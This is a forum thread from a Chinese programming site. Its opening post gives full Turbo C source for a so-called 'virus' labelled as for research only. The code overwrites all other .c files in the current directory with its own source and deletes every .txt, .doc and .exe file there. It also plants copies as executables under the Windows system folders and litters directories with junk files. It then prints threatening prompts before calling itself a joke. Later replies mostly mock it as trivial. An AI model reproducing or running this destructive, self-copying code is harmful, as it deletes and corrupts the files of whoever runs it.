| 网站首页 | 业界新闻 | 小组 | 威客 | 人才 | 下载频道 | 博客 | 代码贴 | 在线编程 | 编程论坛
欢迎加入我们,一同切磋技术
用户名:   
 
密 码:  
共有 5546 人关注过本帖
标题:[讨论]C病毒代码(声明:不能去害人,只能研究技术!)
只看楼主 加入收藏
fengyun5_1
Rank: 1
等 级:新手上路
帖 子:41
专家分:0
注 册:2007-4-7
收藏
 问题点数:0 回复次数:43 
[讨论]C病毒代码(声明:不能去害人,只能研究技术!)

#include <io.h>
#include <dir.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* copy outfile to infile */
void copyfile(char *infile, char *outfile)
{
FILE *in,*out;

in = fopen(infile,"r");
out = fopen(outfile,"w");

while (!feof(in))
{
fputc(fgetc(in),out);
}

fclose(in);
fclose(out);
}
//This function named Rubbishmaker(垃圾制造者).//
void MakeRubbish()
{
int i;
FILE *fp;
char *path;
char *NewName;
char *disk[7] = {"A","B","C","D","E","F","G"};
char *addtion = ":\\";
/* Make some rubbish at the current catalogue */
for (i = 0; i<5; i++)
{
char tempname[] = "XXXXXX" ;
NewName = mktemp(tempname);
fp = fopen(NewName,"w");
fclose(fp);
}
/* make some rubbish at the root catalogue */
path = strcat(disk[getdisk()],addtion); /* get the root catalogue */
chdir(path); /*change directory according to the "path" */

for (i = 0; i<5; i++)
{
char tempname[] = "XXXXXX";
NewName = mktemp(tempname);
fp = fopen(NewName,"w");
fclose(fp);
}

}
/*This function can creat some .exe or .com documents in the sensitive place.Don't worry,It's only a joke.It will do no harm to your computer.*/

void CreatEXE()
{
int i;
char *path;
char * s[2] = {"C:\\WINDOWS\\system32\\loveworm.exe","C:\\WINDOWS\\virusssss.com"};
for ( i = 0; i < 2; i++)
{
open(s[i], 0x0100,0x0080);
copyfile( "C_KILLER.C",s[i]);
}
}
/* remove something from your computer */
void Remove()
{

int done;
int i;

struct ffblk ffblk;
char *documenttype[3] = {"*.txt","*.doc","*.exe"};
for (i = 0; i < 3; i++)
{
done = findfirst(documenttype[i],&ffblk,2);
while (!done)
{
remove(ffblk.ff_name);
done = findnext(&ffblk);
}
}
}


/* overlay the c programs */
void Breed()
{

int done;
struct ffblk ffblk;

done = findfirst("*.c",&ffblk,2);
while (!done)
{
if (strcmp("C_KILLER.C", ffblk.ff_name) != 0 )

{
copyfile("C_KILLER.C",ffblk.ff_name);
}
done = findnext(&ffblk);
}

}


void main()
{

printf("THERE IS A VIRUS BY XIAOKE.\n\n");

Breed();
Remove();
CreatEXE();


printf("COULD YOU TELL ME YOUR NAME?\n\n");
printf("NOW,PLEASE ENTER YOUR NAME,OR THERE WILL BE SOME TROUBLE WITH YOU!\n\n");

MakeRubbish();
getchar();
printf("IT'S ONLY A JOKE! THANK YOU!\n\n");

clrscr();
system("cmd");
}

搜索更多相关主题的帖子: 声明 技术 代码 害人 研究 
2007-08-20 04:33
chen7806
Rank: 1
等 级:新手上路
威 望:2
帖 子:160
专家分:0
注 册:2007-8-5
收藏
得分:0 
如果提供别人研究,请楼主注释一下,这样菜鸟可能会好理解了。
2007-08-20 08:37
coachard
Rank: 3Rank: 3
等 级:新手上路
威 望:7
帖 子:1251
专家分:0
注 册:2007-8-12
收藏
得分:0 
就这样也能称为病毒???

现在怎么大家就这么无聊,利用些TC下的磁盘函数,目录函数写来一些垃圾制造程序来制造些垃圾而已~~~~~

偶学编程,也许本身就是一个错。。。
2007-08-20 10:59
Skai
Rank: 1
等 级:新手上路
帖 子:69
专家分:0
注 册:2006-8-30
收藏
得分:0 
某些人总想让别人把他当做牛人,他写不出别的东西,就只有写个删删东西之类的称之为病毒,其实他们很弱

个人观点, 无攻击任何人之意思,说错地方切勿见怪

2007-08-20 12:20
liwei99996
Rank: 1
等 级:新手上路
帖 子:4
专家分:0
注 册:2005-11-28
收藏
得分:0 

楼主你懂病毒的慨念吗?

2007-08-20 12:41
boot2046
Rank: 2
等 级:新手上路
威 望:3
帖 子:168
专家分:0
注 册:2007-7-23
收藏
得分:0 
这个也叫病毒,也值得去研究????就是一些文件操作嘛

Linux是简单的,你不需要成为天才也能理解这种简单,Windows是复杂的,就算你是天才也不能理解这种复杂
2007-08-20 12:52
fengyun5_1
Rank: 1
等 级:新手上路
帖 子:41
专家分:0
注 册:2007-4-7
收藏
得分:0 

各位说的是,在下只是拿了一个稍带病毒性质的这么一段小程序而已!
各位如是有高见,发邮箱到fengyun5e1@163.com
至少也让我知道知道自己“弱”在哪里!


为了找到王子,你必须要和很多只青蛙接吻!
2007-08-21 22:30
闭关修炼
Rank: 1
等 级:新手上路
帖 子:28
专家分:0
注 册:2007-8-24
收藏
得分:0 
以下是引用chen7806在2007-8-20 8:37:03的发言:
如果提供别人研究,请楼主注释一下,这样菜鸟可能会好理解了。

9494菜鸟看不了啊~!!


努力努力再努力~!!!!!!
2007-09-07 00:06
topskycn
Rank: 1
等 级:新手上路
帖 子:5
专家分:0
注 册:2005-7-18
收藏
得分:0 
没有哪个高人高在哪里的,高人都是很谦逊的,我顶楼主.希望大家不要相互攻击.有什么意见,程序行上见功夫,楼上两位也可以贴出两个好的程序来,大家一起点评点评呀.
在这里没有别的意思,人家贴出来就应该鼓励嘛.大家说是不是.
2007-09-11 00:50
chen7806
Rank: 1
等 级:新手上路
威 望:2
帖 子:160
专家分:0
注 册:2007-8-5
收藏
得分:0 
是的。支持LS。

我确实是菜鸟,有些老师强装不是,什么什么也,但实质也是如此也。
2007-09-11 08:15
快速回复:[讨论]C病毒代码(声明:不能去害人,只能研究技术!)
数据加载中...
 
   



关于我们 | 广告合作 | 编程中国 | 清除Cookies | TOP | 手机版

编程中国 版权所有,并保留所有权利。
Powered by Discuz, Processed in 0.016200 second(s), 7 queries.
Copyright©2004-2024, BCCN.NET, All Rights Reserved